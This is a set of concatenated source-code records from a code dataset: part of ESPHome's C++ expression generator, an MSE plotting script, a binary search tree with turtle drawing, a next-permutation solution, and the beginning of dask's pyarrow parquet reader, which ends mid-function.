u\"{} {}\".format(self.type, self.id)\n\n\nclass ParameterListExpression(Expression):\n def __init__(self, *parameters):\n super(ParameterListExpression, self).__init__()\n self.parameters = []\n for parameter in parameters:\n if not isinstance(parameter, ParameterExpression):\n parameter = ParameterExpression(*parameter)\n self.parameters.append(parameter)\n self.requires.append(parameter)\n\n def __str__(self):\n return u\", \".join(text_type(x) for x in self.parameters)\n\n\nclass LambdaExpression(Expression):\n def __init__(self, parts, parameters, capture='=', return_type=None):\n super(LambdaExpression, self).__init__()\n self.parts = parts\n if not isinstance(parameters, ParameterListExpression):\n parameters = ParameterListExpression(*parameters)\n self.parameters = parameters\n self.requires.append(self.parameters)\n self.capture = capture\n self.return_type = safe_exp(return_type) if return_type is not None else None\n if return_type is not None:\n self.requires.append(self.return_type)\n for i in range(1, len(parts), 3):\n self.requires.append(parts[i])\n\n def __str__(self):\n cpp = u'[{}]({})'.format(self.capture, self.parameters)\n if self.return_type is not None:\n cpp += u' -> {}'.format(self.return_type)\n cpp += u' {{\\n{}\\n}}'.format(self.content)\n return indent_all_but_first_and_last(cpp)\n\n @property\n def content(self):\n return u''.join(text_type(part) for part in self.parts)\n\n\nclass Literal(Expression):\n def __str__(self):\n raise NotImplementedError\n\n\nclass StringLiteral(Literal):\n def __init__(self, string): # type: (Union[str, unicode]) -> None\n super(StringLiteral, self).__init__()\n self.string = string\n\n def __str__(self):\n return u'{}'.format(cpp_string_escape(self.string))\n\n\nclass IntLiteral(Literal):\n def __init__(self, i): # type: (Union[int, long]) -> None\n super(IntLiteral, self).__init__()\n self.i = i\n\n def __str__(self):\n if self.i > 4294967295:\n return u'{}ULL'.format(self.i)\n if self.i > 2147483647:\n return u'{}UL'.format(self.i)\n if self.i < -2147483648:\n return u'{}LL'.format(self.i)\n return text_type(self.i)\n\n\nclass BoolLiteral(Literal):\n def __init__(self, binary): # type: (bool) -> None\n super(BoolLiteral, self).__init__()\n self.binary = binary\n\n def __str__(self):\n return u\"true\" if self.binary else u\"false\"\n\n\nclass HexIntLiteral(Literal):\n def __init__(self, i): # type: (int) -> None\n super(HexIntLiteral, self).__init__()\n self.i = HexInt(i)\n\n def __str__(self):\n return str(self.i)\n\n\nclass FloatLiteral(Literal):\n def __init__(self, value): # type: (float) -> None\n super(FloatLiteral, self).__init__()\n self.float_ = value\n\n def __str__(self):\n if math.isnan(self.float_):\n return u\"NAN\"\n return u\"{:f}f\".format(self.float_)\n\n\n# pylint: disable=bad-continuation\ndef safe_exp(\n obj # type: Union[Expression, bool, str, unicode, int, long, float, TimePeriod, list]\n ):\n # type: (...) -> Expression\n from esphome.cpp_types import bool_, float_, int32\n\n if isinstance(obj, Expression):\n return obj\n if isinstance(obj, bool):\n return BoolLiteral(obj)\n if isinstance(obj, string_types):\n return StringLiteral(obj)\n if isinstance(obj, HexInt):\n return HexIntLiteral(obj)\n if isinstance(obj, integer_types):\n return IntLiteral(obj)\n if isinstance(obj, float):\n return FloatLiteral(obj)\n if isinstance(obj, TimePeriodMicroseconds):\n return IntLiteral(int(obj.total_microseconds))\n if isinstance(obj, TimePeriodMilliseconds):\n return IntLiteral(int(obj.total_milliseconds))\n if isinstance(obj, TimePeriodSeconds):\n return IntLiteral(int(obj.total_seconds))\n if isinstance(obj, TimePeriodMinutes):\n return IntLiteral(int(obj.total_minutes))\n if isinstance(obj, (tuple, list)):\n return ArrayInitializer(*[safe_exp(o) for o in obj])\n if obj is bool:\n return bool_\n if obj is int:\n return int32\n if obj is float:\n return float_\n raise ValueError(u\"Object is not an expression\", obj)\n\n\nclass Statement(object):\n def __init__(self):\n pass\n\n def __str__(self):\n raise NotImplementedError\n\n\nclass RawStatement(Statement):\n def __init__(self, text):\n super(RawStatement, self).__init__()\n self.text = text\n\n def __str__(self):\n return self.text\n\n\nclass ExpressionStatement(Statement):\n def __init__(self, expression):\n super(ExpressionStatement, self).__init__()\n self.expression = safe_exp(expression)\n\n def __str__(self):\n return u\"{};\".format(self.expression)\n\n\nclass ProgmemAssignmentExpression(AssignmentExpression):\n def __init__(self, type, name, rhs, obj):\n super(ProgmemAssignmentExpression, self).__init__(\n type, '', name, rhs, obj\n )\n\n def __str__(self):\n type_ = self.type\n return u\"static const {} {}[] PROGMEM = {}\".format(type_, self.name, self.rhs)\n\n\ndef progmem_array(id, rhs):\n rhs = safe_exp(rhs)\n obj = MockObj(id, u'.')\n assignment = ProgmemAssignmentExpression(id.type, id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef statement(expression): # type: (Union[Expression, Statement]) -> Statement\n if isinstance(expression, Statement):\n return expression\n return ExpressionStatement(expression)\n\n\ndef variable(id, # type: ID\n rhs, # type: Expression\n type=None # type: MockObj\n ):\n # type: (...) -> MockObj\n rhs = safe_exp(rhs)\n obj = MockObj(id, u'.')\n id.type = type or id.type\n assignment = AssignmentExpression(id.type, '', id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef Pvariable(id, # type: ID\n rhs, # type: Expression\n has_side_effects=True, # type: bool\n type=None # type: MockObj\n ):\n # type: (...) -> MockObj\n rhs = safe_exp(rhs)\n if not has_side_effects and hasattr(rhs, '_has_side_effects'):\n # pylint: disable=attribute-defined-outside-init, protected-access\n rhs._has_side_effects = False\n obj = MockObj(id, u'->', has_side_effects=has_side_effects)\n id.type = type or id.type\n assignment = AssignmentExpression(id.type, '*', id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef add(expression, # type: Union[Expression, Statement]\n require=True # type: bool\n ):\n # type: (...) -> None\n CORE.add(expression, require=require)\n\n\n@coroutine\ndef get_variable(id): # type: (ID) -> Generator[MockObj]\n var = yield CORE.get_variable(id)\n yield var\n\n\n@coroutine\ndef process_lambda(value, # type: Lambda\n parameters, # type: List[Tuple[Expression, str]]\n capture='=', # type: str\n return_type=None # type: Optional[Expression]\n ):\n # type: (...) -> Generator[LambdaExpression]\n from esphome.components.globals import GlobalVariableComponent\n\n if value is None:\n yield\n return\n parts = value.parts[:]\n for i, id in enumerate(value.requires_ids):\n full_id, var = yield CORE.get_variable_with_full_id(id)\n if full_id is not None and isinstance(full_id.type, MockObjClass) and \\\n full_id.type.inherits_from(GlobalVariableComponent):\n parts[i * 3 + 1] = var.value()\n continue\n\n if parts[i * 3 + 2] == '.':\n parts[i * 3 + 1] = var._\n else:\n parts[i * 3 + 1] = var\n parts[i * 3 + 2] = ''\n yield LambdaExpression(parts, parameters, capture, return_type)\n\n\n@coroutine\ndef templatable(value, # type: Any\n args, # type: List[Tuple[SafeExpType, str]]\n output_type, # type: Optional[SafeExpType],\n to_exp=None # type: Optional[Any]\n ):\n if isinstance(value, Lambda):\n lambda_ = yield process_lambda(value, args, return_type=output_type)\n yield lambda_\n else:\n if to_exp is None:\n yield value\n elif isinstance(to_exp, dict):\n yield to_exp[value]\n else:\n yield to_exp(value)\n\n\nclass MockObj(Expression):\n def __init__(self, base, op=u'.', has_side_effects=True):\n self.base = base\n self.op = op\n self._has_side_effects = has_side_effects\n super(MockObj, self).__init__()\n\n def __getattr__(self, attr): # type: (str) -> MockObj\n if attr == u'_':\n obj = MockObj(u'{}{}'.format(self.base, self.op))\n obj.requires.append(self)\n return obj\n if attr == u'new':\n obj = MockObj(u'new {}'.format(self.base), u'->')\n obj.requires.append(self)\n return obj\n next_op = u'.'\n if attr.startswith(u'P') and self.op not in ['::', '']:\n attr = attr[1:]\n next_op = u'->'\n if attr.startswith(u'_'):\n attr = attr[1:]\n obj = MockObj(u'{}{}{}'.format(self.base, self.op, attr), next_op)\n obj.requires.append(self)\n return obj\n\n def __call__(self, *args, **kwargs): # type: (*Any, **Any) -> MockObj\n call = CallExpression(self.base, *args)\n obj = MockObj(call, self.op)\n obj.requires.append(self)\n obj.requires.append(call)\n return obj\n\n def __str__(self): # type: () -> unicode\n return text_type(self.base)\n\n def require(self): # type: () -> None\n self.required = True\n for require in self.requires:\n if require.required:\n continue\n require.require()\n\n def template(self, *args): # type: (Tuple[Union[TemplateArguments, Expression]]) -> MockObj\n if len(args) != 1 or not isinstance(args[0], TemplateArguments):\n args = TemplateArguments(*args)\n else:\n args = args[0]\n obj = MockObj(u'{}{}'.format(self.base, args))\n obj.requires.append(self)\n obj.requires.append(args)\n return obj\n\n def namespace(self, name): # type: (str) -> MockObj\n obj = MockObj(u'{}{}{}'.format(self.base, self.op, name), u'::')\n obj.requires.append(self)\n return obj\n\n def class_(self, name, *parents): # type: (str, *MockObjClass) -> MockObjClass\n op = '' if self.op == '' else '::'\n obj = MockObjClass(u'{}{}{}'.format(self.base, op, name), u'.', parents=parents)\n obj.requires.append(self)\n return obj\n\n def struct(self, name): # type: (str) -> MockObjClass\n return self.class_(name)\n\n def enum(self, name, is_class=False): # type: (str, bool) -> MockObj\n if is_class:\n return self.namespace(name)\n\n return self\n\n def operator(self, name): # type: (str) -> MockObj\n if name == 'ref':\n obj = MockObj(u'{} &'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n if name == 'ptr':\n obj = MockObj(u'{} *'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n if name == \"const\":\n obj = MockObj(u'const {}'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n raise NotImplementedError\n\n def has_side_effects(self): # type: () -> bool\n return self._has_side_effects\n\n def __getitem__(self, item): # type: (Union[str, Expression]) -> MockObj\n next_op = u'.'\n if isinstance(item, str) and item.startswith(u'P'):\n item = item[1:]\n next_op = u'->'\n obj = MockObj(u'{}[{}]'.format(self.base, item), next_op)\n obj.requires.append(self)\n if isinstance(item, Expression):\n obj.requires.append(item)\n return obj\n\n\nclass MockObjClass(MockObj):\n def __init__(self, *args, **kwargs):\n parens = kwargs.pop('parents')\n MockObj.__init__(self, *args, **kwargs)\n self._parents = []\n for paren in parens:\n if not isinstance(paren, MockObjClass):\n raise ValueError\n self._parents.append(paren)\n # pylint: disable=protected-access\n self._parents += paren._parents\n\n def inherits_from(self, other): # type: (MockObjClass) -> bool\n if self == other:\n return True\n for parent in self._parents:\n if parent == other:\n return True\n return False\n\n def template(self,\n *args # type: Tuple[Union[TemplateArguments, Expression]]\n ):\n # type: (...) -> MockObjClass\n if len(args) != 1 or not isinstance(args[0], TemplateArguments):\n args = TemplateArguments(*args)\n else:\n args = args[0]\n new_parents = self._parents[:]\n new_parents.append(self)\n obj = MockObjClass(u'{}{}'.format(self.base, args), parents=new_parents)\n obj.requires.append(self)\n obj.requires.append(args)\n return obj\n","sub_path":"esphome/cpp_generator.py","file_name":"cpp_generator.py","file_ext":"py","file_size_in_byte":18725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479277007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 4 22:48:59 2017\n\n@author: nicho\n\"\"\"\nimport numpy as np\n\n#Validation set MSE graph ################################### \nval_MSE = np.array(val_MSE)\nMSEsplitVAL = np.split(val_MSE,10)\nMSEsplitVAL = np.array(MSEsplitVAL).T\nMSEsplitVAL = pd.DataFrame(MSEsplitVAL)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitVAL[graph])\n VALMean = MSEsplitVAL.mean(axis=1)\n VALmin = min(VALMean)\n minVALind = (VALMean==VALmin).argmax()+1\n plt.scatter(minVALind, VALmin,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"Validation Set\")\nplt.show()\n\n#K Fold, K = 5 graph #######################################\nplt.figure()\nk5_MSE = np.array(k5_MSE)\nMSEsplitK5 = np.split(k5_MSE,10)\nMSEsplitK5 = np.array(MSEsplitK5).T\nMSEsplitK5 = pd.DataFrame(MSEsplitK5)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitK5[graph])\n K5mean = MSEsplitK5.mean(axis=1)\n K5min = min(K5mean)\n minK5ind = (K5mean==K5min).argmax()+1\n plt.scatter(minK5ind, K5min,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"K Fold, K = 5\")\nplt.show()\n\n#K Fold, K = 10 graph ########################################\nplt.figure()\nk10_MSE = np.array(k10_MSE)\nMSEsplitK10 = np.split(k10_MSE,10)\nMSEsplitK10 = np.array(MSEsplitK10).T\nMSEsplitK10 = pd.DataFrame(MSEsplitK10)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitK10[graph])\n K10mean = MSEsplitK10.mean(axis=1)\n K10min = min(K10mean)\n minK10ind = (K10mean==K10min).argmax()+1\n plt.scatter(minK10ind, K10min,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"K Fold, K = 10\")\nplt.show()\n\n\n","sub_path":"HW3/shoot1.py","file_name":"shoot1.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"365072294","text":"from turtle import *\n\n\nclass Node:\n def __init__(self, key, parent=None, left=None, right=None, flag=None):\n self.key = key\n self.p = parent\n self.left = left\n self.right = right\n self.flag = flag\n\n # 探索\n def search(self, k):\n if self is None or k == self.key:\n return self\n if k < self.key:\n return self.left.search(k)\n else:\n return self.right.search(k)\n\n # 挿入\n def insert(self, value):\n z = Node(value)\n change = None\n self = self.root()\n while self:\n change = self\n if z.key < self.key:\n self = self.left\n else:\n self = self.right\n z.p = change\n if change is None:\n pass\n elif z.key < change.key:\n change.left = z\n else:\n change.right = z\n\n # 消去に使う左にある要素を取る\n def minimum(self):\n while self.left:\n self = self.left\n return self\n\n # 消去に使う一番上の要素を取る\n def root(self):\n while self.p:\n self = self.p\n return self\n\n # 消去に使う消す対象と入れ替える\n def transparent(self, change):\n # rootの場合\n if self.p is None:\n pass\n # 親から見て左か右か判定して入れ替える\n elif self == self.p.left:\n self.p.left = change\n else:\n self.p.right = change\n # 変えたやつの親を変える\n if change:\n change.p = self.p\n\n # 削除\n def delete(self):\n # 左右どちらかしかない場合\n if self.left is None:\n change = self.right\n self.transparent(change)\n elif self.right is None:\n change = self.left\n self.transparent(change)\n # どっちもあるとき\n else:\n # 消す要素の右に行って一番左を入れ替える要素に\n change = self.right.minimum()\n # 消す要素が親より二階以上低い場合\n if change.p != self:\n # 上に持ってくる\n change.transparent(change.right)\n change.right = self.right\n change.right.p = change\n self.transparent(change)\n change.left = self.left\n change.left.p = change\n return change.root()\n\n # お絵かき\n def print_tree(self):\n # 数字を書く\n write(str(self.key), False, align=\"center\", font=('Arial', 16, 'normal'))\n # 先の長さを入れる\n if self.root() == self:\n # 値は適当\n self.stick = 200\n else:\n # 値は適当\n self.stick = self.p.stick * 0.6\n # 左右があったら書く\n if self.left is not None:\n self.left.flag = 'left'\n right(40)\n forward(self.stick)\n left(40)\n self.left.print_tree()\n if self.right is not None:\n self.right.flag = 'right'\n left(40)\n forward(self.stick)\n right(40)\n self.right.print_tree()\n # 左右がなかったら戻る\n if self.flag == 'left':\n right(40)\n backward(self.p.stick)\n left(40)\n elif self.flag == 'right':\n left(40)\n backward(self.p.stick)\n right(40)\n\n\ndef main():\n # データセット\n r = Node(15)\n x1 = Node(6, r)\n x2 = Node(18, r)\n x3 = Node(3, x1)\n x4 = Node(7, x1)\n x5 = Node(17, x2)\n x6 = Node(20, x2)\n x7 = Node(2, x3)\n x8 = Node(4, x3)\n x9 = Node(13, x4)\n x10 = Node(9, x9)\n x11 = Node(19, x6)\n\n # 後からleft,rightを代入\n r.left, r.right = x1, x2\n x1.left, x1.right = x3, x4\n x2.left, x2.right = x5, x6\n x3.left, x3.right = x7, x8\n x4.right = x9\n x9.left = x10\n x6.left = x11\n # print(\"探索\")\n # print(r.search(13)) # 13\n\n # print(\"\\n挿入\")\n # r.insert(10) # 10を挿入\n # print(r.search(10)) # 確認\n\n # print(\"before:{}\".format(r.left.right))\n # r = r.search(7).delete()\n # print(\"after:{}\".format(r.left.right))\n\n # print(\"before:{}\".format(r.left))\n # r = r.search(18).delete()\n # print(\"after:{}\".format(r.left))\n\n color(\"green\")\n right(90)\n up()\n backward(200)\n pd()\n r.print_tree()\n input('exit')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"68472129","text":"'''\n1. Brute Force: 先对nums排序,然后全排列,到了目标数组序列时标记一下,下一个序列就是答案。时间复杂度O(nlogn)+2**n\n2. ��对当前数组操作,尝试从当前变到下一个字典序。最直接的想法是从后往前便利,碰到变小的情况就交换,尽管如此但有些情况不能满足。但比如1432,正确结果应该是2134,而直接换得到4132.\n那如何处理呢? 这里是思维的难点,首先这不是递归回溯问题,也不是最优解问题,也不需要哈希,它是一个纯数组问题,没有别的巧思,只能通过遍历,写出一个规则让它得到结果。\n\n1423->2143有什么规律呢,仔细思考一下规律就是,4碰到1时不直接换,而是回头再向右遍历找到一个刚好大于1的一个数,交换数值。最后从4开始后面的数排序. 进一步看,交换后4开始往后的数组是一个倒叙的数组,只需要首末两端两两呼唤即可\n'''\nclass Solution(object): \n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n idx = len(nums)-1\n while idx>0 and nums[idx]<=nums[idx-1]:\n idx -= 1\n if idx==0:\n return nums.reverse()\n else:\n i = idx\n while inums[idx-1]:\n i += 1\n nums[idx-1], nums[i-1] = nums[i-1], nums[idx-1]\n left, right = idx, len(nums)-1\n while right>left:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right -= 1\n return nums\n","sub_path":"array/31-NextPermutation.py","file_name":"31-NextPermutation.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"512406483","text":"from functools import partial\nfrom collections import defaultdict\nimport json\nimport warnings\nfrom distutils.version import LooseVersion\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom ....utils import getargspec\nfrom ..utils import _get_pyarrow_dtypes, _meta_from_dtypes\nfrom ...utils import clear_known_categories\nfrom ....core import flatten\nfrom dask import delayed\n\nfrom .utils import (\n _parse_pandas_metadata,\n _normalize_index_columns,\n Engine,\n _analyze_paths,\n)\n\npreserve_ind_supported = pa.__version__ >= LooseVersion(\"0.15.0\")\nschema_field_supported = pa.__version__ >= LooseVersion(\"0.15.0\")\n\n\n#\n# Private Helper Functions\n#\n\n\ndef _append_row_groups(metadata, md):\n try:\n metadata.append_row_groups(md)\n except RuntimeError as err:\n if \"requires equal schemas\" in str(err):\n raise RuntimeError(\n \"Schemas are inconsistent, try using \"\n '`to_parquet(..., schema=\"infer\")`, or pass an explicit '\n \"pyarrow schema.\"\n )\n else:\n raise err\n\n\ndef _write_partitioned(\n table, root_path, filename, partition_cols, fs, index_cols=(), **kwargs\n):\n \"\"\"Write table to a partitioned dataset with pyarrow.\n\n Logic copied from pyarrow.parquet.\n (arrow/python/pyarrow/parquet.py::write_to_dataset)\n\n TODO: Remove this in favor of pyarrow's `write_to_dataset`\n once ARROW-8244 is addressed.\n \"\"\"\n fs.mkdirs(root_path, exist_ok=True)\n\n df = table.to_pandas(ignore_metadata=True)\n index_cols = list(index_cols) if index_cols else []\n preserve_index = False\n if index_cols and preserve_ind_supported:\n df.set_index(index_cols, inplace=True)\n preserve_index = True\n\n partition_keys = [df[col] for col in partition_cols]\n data_df = df.drop(partition_cols, axis=\"columns\")\n data_cols = df.columns.drop(partition_cols)\n if len(data_cols) == 0 and not index_cols:\n raise ValueError(\"No data left to save outside partition columns\")\n\n subschema = table.schema\n for col in table.schema.names:\n if col in partition_cols:\n subschema = subschema.remove(subschema.get_field_index(col))\n\n md_list = []\n for keys, subgroup in data_df.groupby(partition_keys):\n if not isinstance(keys, tuple):\n keys = (keys,)\n subdir = fs.sep.join(\n [\n \"{colname}={value}\".format(colname=name, value=val)\n for name, val in zip(partition_cols, keys)\n ]\n )\n subtable = pa.Table.from_pandas(\n subgroup, preserve_index=preserve_index, schema=subschema, safe=False\n )\n prefix = fs.sep.join([root_path, subdir])\n fs.mkdirs(prefix, exist_ok=True)\n full_path = fs.sep.join([prefix, filename])\n with fs.open(full_path, \"wb\") as f:\n pq.write_table(subtable, f, metadata_collector=md_list, **kwargs)\n md_list[-1].set_file_path(fs.sep.join([subdir, filename]))\n\n return md_list\n\n\ndef _index_in_schema(index, schema):\n if index and schema is not None:\n # Make sure all index columns are in user-defined schema\n return len(set(index).intersection(schema.names)) == len(index)\n elif index:\n return True # Schema is not user-specified, all good\n else:\n return False # No index to check\n\n\ndef _get_dataset_object(paths, fs, filters, dataset_kwargs):\n \"\"\"Generate a ParquetDataset object\"\"\"\n kwargs = dataset_kwargs.copy()\n if \"validate_schema\" not in kwargs:\n kwargs[\"validate_schema\"] = False\n if len(paths) > 1:\n # This is a list of files\n base, fns = _analyze_paths(paths, fs)\n proxy_metadata = None\n if \"_metadata\" in fns:\n # We have a _metadata file. PyArrow cannot handle\n # \"_metadata\" when `paths` is a list. So, we shuld\n # open \"_metadata\" separately.\n paths.remove(fs.sep.join([base, \"_metadata\"]))\n fns.remove(\"_metadata\")\n with fs.open(fs.sep.join([base, \"_metadata\"]), mode=\"rb\") as fil:\n proxy_metadata = pq.ParquetFile(fil).metadata\n # Create our dataset from the list of data files.\n # Note #1: that this will not parse all the files (yet)\n # Note #2: Cannot pass filters for legacy pyarrow API (see issue#6512).\n # We can handle partitions + filtering for list input after\n # adopting new pyarrow.dataset API.\n dataset = pq.ParquetDataset(paths, filesystem=fs, **kwargs)\n if proxy_metadata:\n dataset.metadata = proxy_metadata\n elif fs.isdir(paths[0]):\n # This is a directory. We can let pyarrow do its thing.\n # Note: In the future, it may be best to avoid listing the\n # directory if we can get away with checking for the\n # existence of _metadata. Listing may be much more\n # expensive in storage systems like S3.\n allpaths = fs.glob(paths[0] + fs.sep + \"*\")\n base, fns = _analyze_paths(allpaths, fs)\n dataset = pq.ParquetDataset(paths[0], filesystem=fs, filters=filters, **kwargs)\n else:\n # This is a single file. No danger in gathering statistics\n # and/or splitting row-groups without a \"_metadata\" file\n base = paths[0]\n fns = [None]\n dataset = pq.ParquetDataset(paths[0], filesystem=fs, **kwargs)\n\n return dataset, base, fns\n\n\ndef _gather_metadata(\n paths, fs, split_row_groups, gather_statistics, filters, dataset_kwargs\n):\n \"\"\"Gather parquet metadata into a single data structure.\n\n Use _metadata or aggregate footer metadata into a single\n object. Also, collect other information necessary for\n parquet-to-ddf mapping (e.g. schema, partition_info).\n \"\"\"\n\n # Step 1: Create a ParquetDataset object\n dataset, base, fns = _get_dataset_object(paths, fs, filters, dataset_kwargs)\n if fns == [None]:\n # This is a single file. No danger in gathering statistics\n # and/or splitting row-groups without a \"_metadata\" file\n if gather_statistics is None:\n gather_statistics = True\n if split_row_groups is None:\n split_row_groups = True\n\n # Step 2: Construct necessary (parquet) partitioning information\n partition_info = {\"partitions\": None, \"partition_keys\": {}, \"partition_names\": []}\n fn_partitioned = False\n if dataset.partitions is not None:\n fn_partitioned = True\n partition_info[\"partition_names\"] = [\n n for n in dataset.partitions.partition_names if n is not None\n ]\n partition_info[\"partitions\"] = dataset.partitions\n for piece in dataset.pieces:\n partition_info[\"partition_keys\"][piece.path] = piece.partition_keys\n\n # Step 3: Construct a single `metadata` object. We can\n # directly use dataset.metadata if it is available.\n # Otherwise, if `gather_statistics` or `split_row_groups`,\n # we need to gether the footer metadata manually\n metadata = None\n if dataset.metadata:\n # We have a _metadata file.\n # PyArrow already did the work for us\n schema = dataset.metadata.schema.to_arrow_schema()\n if gather_statistics is None:\n gather_statistics = True\n if split_row_groups is None:\n split_row_groups = True\n return (\n schema,\n dataset.metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n else:\n # No _metadata file.\n # May need to collect footer metadata manually\n if dataset.schema is not None:\n schema = dataset.schema.to_arrow_schema()\n else:\n schema = None\n if gather_statistics is None:\n gather_statistics = False\n if split_row_groups is None:\n split_row_groups = False\n metadata = None\n if not (split_row_groups or gather_statistics):\n # Don't need to construct real metadata if\n # we are not gathering statistics or splitting\n # by row-group\n metadata = [p.path for p in dataset.pieces]\n if schema is None:\n schema = dataset.pieces[0].get_metadata().schema.to_arrow_schema()\n return (\n schema,\n metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n # We have not detected a _metadata file, and the user has specified\n # that they want to split by row-group and/or gather statistics.\n # This is the only case where we MUST scan all files to collect\n # metadata.\n for piece, fn in zip(dataset.pieces, fns):\n md = piece.get_metadata()\n if schema is None:\n schema = md.schema.to_arrow_schema()\n if fn_partitioned:\n md.set_file_path(piece.path.replace(base + fs.sep, \"\"))\n elif fn:\n md.set_file_path(fn)\n if metadata:\n _append_row_groups(metadata, md)\n else:\n metadata = md\n return (\n schema,\n metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n\n\ndef _generate_dd_meta(schema, index, categories, partition_info):\n partition_obj = partition_info[\"partitions\"]\n partitions = partition_info[\"partition_names\"]\n columns = None\n\n has_pandas_metadata = schema.metadata is not None and b\"pandas\" in schema.metadata\n\n if has_pandas_metadata:\n pandas_metadata = json.loads(schema.metadata[b\"pandas\"].decode(\"utf8\"))\n (\n index_names,\n column_names,\n storage_name_mapping,\n column_index_names,\n ) = _parse_pandas_metadata(pandas_metadata)\n if categories is None:\n categories = []\n for col in pandas_metadata[\"columns\"]:\n if (col[\"pandas_type\"] == \"categorical\") and (\n col[\"name\"] not in categories\n ):\n categories.append(col[\"name\"])\n else:\n # No pandas metadata implies no index, unless selected by the user\n index_names = []\n column_names = schema.names\n storage_name_mapping = {k: k for k in column_names}\n column_index_names = [None]\n\n if index is None and index_names:\n index = index_names\n\n if set(column_names).intersection(partitions):\n raise ValueError(\n \"partition(s) should not exist in columns.\\n\"\n \"categories: {} | partitions: {}\".format(column_names, partitions)\n )\n\n column_names, index_names = _normalize_index_columns(\n columns, column_names + partitions, index, index_names\n )\n\n all_columns = index_names + column_names\n\n # Check that categories are included in columns\n if categories and not set(categories).intersection(all_columns):\n raise ValueError(\n \"categories not in available columns.\\n\"\n \"categories: {} | columns: {}\".format(categories, list(all_columns))\n )\n\n dtypes = _get_pyarrow_dtypes(schema, categories)\n dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}\n\n index_cols = index or ()\n meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)\n meta = clear_known_categories(meta, cols=categories)\n\n if partition_obj:\n for partition in partition_obj:\n if isinstance(index, list) and partition.name == index[0]:\n # Index from directory structure\n meta.index = pd.CategoricalIndex(\n categories=partition.keys, name=index[0]\n )\n elif partition.name == meta.index.name:\n # Index created from a categorical column\n meta.index = pd.CategoricalIndex(\n categories=partition.keys, name=meta.index.name\n )\n elif partition.name in meta.columns:\n meta[partition.name] = pd.Series(\n pd.Categorical(categories=partition.keys, values=[]),\n index=meta.index,\n )\n\n return meta, index_cols, categories, index\n\n\ndef _aggregate_stats(\n file_path, file_row_group_stats, file_row_group_column_stats, stat_col_indices\n):\n \"\"\"Utility to aggregate the statistics for N row-groups\n into a single dictionary.\n \"\"\"\n if len(file_row_group_stats) < 1:\n # Empty statistics\n return {}\n elif len(file_row_group_column_stats) == 0:\n assert len(file_row_group_stats) == 1\n return file_row_group_stats[0]\n else:\n # Note: It would be better to avoid df_rgs and df_cols\n # construction altogether. It makes it fast to aggregate\n # the statistics for many row groups, but isn't\n # worthwhile for a small number of row groups.\n if len(file_row_group_stats) > 1:\n df_rgs = pd.DataFrame(file_row_group_stats)\n s = {\n \"file_path_0\": file_path,\n \"num-rows\": df_rgs[\"num-rows\"].sum(),\n \"total_byte_size\": df_rgs[\"total_byte_size\"].sum(),\n \"columns\": [],\n }\n else:\n s = {\n \"file_path_0\": file_path,\n \"num-rows\": file_row_group_stats[0][\"num-rows\"],\n \"total_byte_size\": file_row_group_stats[0][\"total_byte_size\"],\n \"columns\": [],\n }\n\n df_cols = None\n if len(file_row_group_column_stats) > 1:\n df_cols = pd.DataFrame(file_row_group_column_stats)\n for ind, name in enumerate(stat_col_indices):\n i = ind * 3\n if df_cols is None:\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": file_row_group_column_stats[0][i],\n \"max\": file_row_group_column_stats[0][i + 1],\n \"null_count\": file_row_group_column_stats[0][i + 2],\n }\n )\n else:\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": df_cols.iloc[:, i].min(),\n \"max\": df_cols.iloc[:, i + 1].max(),\n \"null_count\": df_cols.iloc[:, i + 2].sum(),\n }\n )\n return s\n\n\ndef _process_metadata(\n metadata, single_rg_parts, gather_statistics, stat_col_indices, no_filters\n):\n # Get the number of row groups per file\n file_row_groups = defaultdict(list)\n file_row_group_stats = defaultdict(list)\n file_row_group_column_stats = defaultdict(list)\n cmax_last = {}\n for rg in range(metadata.num_row_groups):\n row_group = metadata.row_group(rg)\n fpath = row_group.column(0).file_path\n if fpath is None:\n raise ValueError(\n \"Global metadata structure is missing a file_path string. \"\n \"If the dataset includes a _metadata file, that file may \"\n \"have one or more missing file_path fields.\"\n )\n if file_row_groups[fpath]:\n file_row_groups[fpath].append(file_row_groups[fpath][-1] + 1)\n else:\n 